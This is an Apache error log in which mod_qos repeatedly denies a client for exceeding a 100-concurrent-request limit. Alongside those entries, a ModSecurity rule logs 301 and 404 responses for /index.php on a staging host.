[Tue May 26 19:59:33.876101 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx6QAAAFU
[Tue May 26 19:59:33.877806 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx6gAAAFk
[Tue May 26 19:59:33.885954 2026] [qos:error] [pid 93868:tid 94268] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257wAAAAZk
[Tue May 26 19:59:33.892410 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx6wAAACg
[Tue May 26 19:59:33.895258 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx7AAAACc
[Tue May 26 19:59:33.895571 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257wQAAAZQ
[Tue May 26 19:59:33.897264 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTUqK9k_ZUB2Vp257wgAAAe8
[Tue May 26 19:59:33.912639 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTWDRMqfxdEDkoszx7QAAADM
[Tue May 26 19:59:34.023414 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx8gAAABg
[Tue May 26 19:59:34.026247 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx8wAAADQ
[Tue May 26 19:59:34.029914 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx9AAAAAI
[Tue May 26 19:59:34.032465 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx9QAAABc
[Tue May 26 19:59:34.038926 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257xAAAAco
[Tue May 26 19:59:34.046076 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx9gAAAFY
[Tue May 26 19:59:34.047028 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257xQAAAb8
[Tue May 26 19:59:34.048513 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx9wAAACA
[Tue May 26 19:59:34.049234 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257xgAAAgA
[Tue May 26 19:59:34.072498 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx-gAAABM
[Tue May 26 19:59:34.172864 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszx_wAAAEI
[Tue May 26 19:59:34.174500 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyAAAAABQ
[Tue May 26 19:59:34.183661 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyAgAAAFs
[Tue May 26 19:59:34.186814 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyAwAAADk
[Tue May 26 19:59:34.192376 2026] [qos:error] [pid 93868:tid 94320] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257zQAAAc0
[Tue May 26 19:59:34.198574 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257zgAAAc8
[Tue May 26 19:59:34.199660 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyBAAAAGA
[Tue May 26 19:59:34.200905 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp257zwAAAa4
[Tue May 26 19:59:34.201976 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyBQAAAEM
[Tue May 26 19:59:34.226476 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyBwAAAGU
[Tue May 26 19:59:34.274605 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxcgAAAE8"]
[Tue May 26 19:59:34.281245 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PkwAAAI8"]
[Tue May 26 19:59:34.286095 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PkAAAANc"]
[Tue May 26 19:59:34.292803 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PjwAAAIo"]
[Tue May 26 19:59:34.294996 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257cgAAAdA"]
[Tue May 26 19:59:34.301866 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PmAAAANo"]
[Tue May 26 19:59:34.307211 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257hAAAAf8"]
[Tue May 26 19:59:34.309833 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxgQAAAFA"]
[Tue May 26 19:59:34.311869 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxewAAAFI"]
[Tue May 26 19:59:34.315542 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257eQAAAb0"]
[Tue May 26 19:59:34.320455 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PkQAAAK0"]
[Tue May 26 19:59:34.320516 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTGDRMqfxdEDkoszxfwAAAH8"]
[Tue May 26 19:59:34.326828 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257cwAAAeg"]
[Tue May 26 19:59:34.332736 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257dAAAAfE"]
[Tue May 26 19:59:34.336630 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PlAAAAME"]
[Tue May 26 19:59:34.342950 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PpwAAAPU"]
[Tue May 26 19:59:34.363928 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTIZZc2DoU1lPnP1PlQAAALw"]
[Tue May 26 19:59:34.381983 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257gwAAAbs"]
[Tue May 26 19:59:34.382249 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTEqK9k_ZUB2Vp257igAAAac"]
[Tue May 26 19:59:34.394341 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PsAAAAKw"]
[Tue May 26 19:59:34.395486 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PtAAAAOU"]
[Tue May 26 19:59:34.397335 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PqgAAALc"]
[Tue May 26 19:59:34.397415 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxvQAAADY"]
[Tue May 26 19:59:34.398387 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PrgAAAKc"]
[Tue May 26 19:59:34.402901 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PswAAAKo"]
[Tue May 26 19:59:34.408995 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PrwAAAKI"]
[Tue May 26 19:59:34.424336 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PuwAAAN8"]
[Tue May 26 19:59:34.427081 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxtAAAAHk"]
[Tue May 26 19:59:34.431835 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PtQAAAKk"]
[Tue May 26 19:59:34.432474 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxtQAAABY"]
[Tue May 26 19:59:34.436829 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PwAAAANY"]
[Tue May 26 19:59:34.446022 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxxwAAAH0"]
[Tue May 26 19:59:34.447007 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxxgAAAAE"]
[Tue May 26 19:59:34.939128 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTkqK9k_ZUB2Vp2578QAAAa4
[Tue May 26 19:59:34.939705 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTmDRMqfxdEDkoszyRAAAABU
[Tue May 26 19:59:34.939713 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuToZZc2DoU1lPnP1QEwAAAKg
[Tue May 26 19:59:34.940961 2026] [qos:error] [pid 93868:tid 94320] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTkqK9k_ZUB2Vp2579AAAAc0
[Tue May 26 19:59:34.940972 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuTkqK9k_ZUB2Vp2579QAAAaQ
[Tue May 26 19:59:34.941959 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTkqK9k_ZUB2Vp2579gAAAa4
[Tue May 26 19:59:34.945104 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuToZZc2DoU1lPnP1QFwAAALQ
[Tue May 26 19:59:34.946139 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuToZZc2DoU1lPnP1QGQAAAKE
[Tue May 26 19:59:34.946592 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuToZZc2DoU1lPnP1QGAAAALM
[Tue May 26 19:59:34.956870 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuToZZc2DoU1lPnP1QHQAAAKc
[Tue May 26 19:59:35.027898 2026] [security2:error] [pid 106517:tid 106683] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P9wAAAKU"]
[Tue May 26 19:59:35.089302 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszySgAAAGo
[Tue May 26 19:59:35.090509 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszySwAAACM
[Tue May 26 19:59:35.090577 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp257-AAAAgM
[Tue May 26 19:59:35.091311 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyTQAAABA
[Tue May 26 19:59:35.091699 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyTAAAACg
[Tue May 26 19:59:35.096380 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp257-QAAAY8
[Tue May 26 19:59:35.101581 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyTgAAADU
[Tue May 26 19:59:35.105912 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyTwAAACc
[Tue May 26 19:59:35.107192 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyUAAAABo
[Tue May 26 19:59:35.109076 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyUQAAAHk
[Tue May 26 19:59:35.278202 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PxAAAAOQ"]
[Tue May 26 19:59:35.284934 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PwwAAAP4"]
[Tue May 26 19:59:35.285021 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTUqK9k_ZUB2Vp257tgAAAZg"]
[Tue May 26 19:59:35.285493 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTUqK9k_ZUB2Vp257sAAAAZM"]
[Tue May 26 19:59:35.293535 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTUqK9k_ZUB2Vp257twAAAaA"]
[Tue May 26 19:59:35.306018 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxxQAAADg"]
[Tue May 26 19:59:35.310120 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1P0gAAAJc"]
